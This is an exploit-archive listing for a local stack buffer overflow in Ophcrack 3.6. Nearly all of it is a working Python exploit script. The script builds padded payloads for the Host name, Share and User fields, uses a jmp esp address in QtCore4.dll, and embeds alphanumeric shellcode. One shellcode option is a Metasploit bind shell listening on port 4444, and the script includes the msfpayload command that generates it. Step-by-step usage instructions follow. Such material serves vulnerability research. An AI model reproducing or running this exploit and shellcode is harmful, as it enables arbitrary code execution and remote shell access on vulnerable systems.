Ophcrack 3.6 Local Buffer Overflow

2013-12-29T00:00:00
ID PACKETSTORM:124622
Type packetstorm
Reporter Osanda Malith
Modified 2013-12-29T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow  
# Version: 3.6  
# Tested on: Windows XP SP2 en, Windows 8 64-bit  
# Vendor: http://ophcrack.sourceforge.net/  
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe  
# Original Advisory: http://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/  
# E-Mail: osandajayathissa@gmail.com  
# Exploit-Author: Osanda Malith   
# Twitter: @OsandaMalith  
# /!\ Author is not responsible for any damage you cause  
# This POC is for educational purposes only  
# Video: https://www.youtube.com/watch?v=YPPIyxPMakI  
'''  
This exploit is super lame, as no user is going to paste 1000 characters  
of text into the textbox, however it could potentially be used for  
privilege escalation. It was still a fun learning exercise.  
'''  
'''  
To exploit this bug open Ophcrack -> Click Load -> Remote SAM  
There are three fields "Host name:", "Share:", "User:"  
All three fields are vulnerable. I have made this exploit to work on those 3 fields.  
Copy the contents written to the file into the specific field you selected and click ok.  
'''  
print '''  
  
_/_/ _/ _/   
_/ _/ _/_/_/ _/_/_/ _/_/_/ _/ _/_/ _/_/_/ _/_/_/ _/ _/  
_/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/_/   
_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/   
_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/ _/   
_/   
_/   
  
[+] Opchrack 3.6 Local Buffer Overflow Exploit  
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >  
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >  
  
'''  
while True:  
try:  
choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"))  
except ValueError:  
print "[!] Enter only a number"  
continue  
# If you select "Host name" you would get a error after injecting. Click "Don't send" and enjoy the payload   
if choice == 1:  
buff = "A" * 497   
break  
elif choice == 2:  
buff = "A" * 504  
break  
elif choice == 3:  
buff = "A" * 504  
break   
else:  
print "[-] Invalid Choice"  
continue  
# jmp instruction must be 'ascii' due to character set restrictions  
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)  
eip = "\x39\x5b\x2b\x6e"   
  
while True:  
try:  
choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"))  
except ValueError:  
print "[!] Enter only a number"  
continue  
  
if choice == 1:  
#ALPHA3.py esp --input="shellcode.bin"   
shellcode = "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"  
shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"  
shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"  
shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"  
shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"  
shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"   
break  
elif choice == 2:  
# Thanks to Matt for teaching me about choosing correct shellcode :-)  
# Modify this part with your own custom shellcode  
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP  
shellcode = (  
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"  
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"  
"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"  
"\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"  
"\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"  
"\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"  
"\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"  
"\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"  
"\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"  
"\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"  
"\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"  
"\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"  
"\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"  
"\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"  
"\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"  
"\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"  
"\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"  
"\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"  
"\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"  
"\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"  
"\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"  
"\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"  
"\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"  
"\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"  
"\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"  
"\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"  
"\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"  
"\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"  
"\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"  
"\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"  
"\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"  
"\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"  
"\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"  
"\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"  
"\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"  
"\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"  
"\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"  
"\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"  
"\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"  
"\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"  
"\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"  
"\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"  
"\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"  
"\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"  
"\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"  
"\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"  
"\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"  
"\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"  
"\x41")  
print "[+] Connect on port 4444"  
break  
else:  
print "[-] Invalid Choice"  
continue  
  
junk = "A" * 100  
# Glad to write this at 17 ;)  
# Combine strings  
exploit = buff + eip + shellcode + junk  
print "[+] Writing to file >> exploit.txt"  
# Write it out to file  
file = open("exploit.txt", "w")  
file.write(exploit)  
file.close()  
print "[~] " + str(len(exploit)) + " Bytes written to file"   
print "[+] Copy all the contents inside the file into the field you selected and click ok"  
#EOF  
`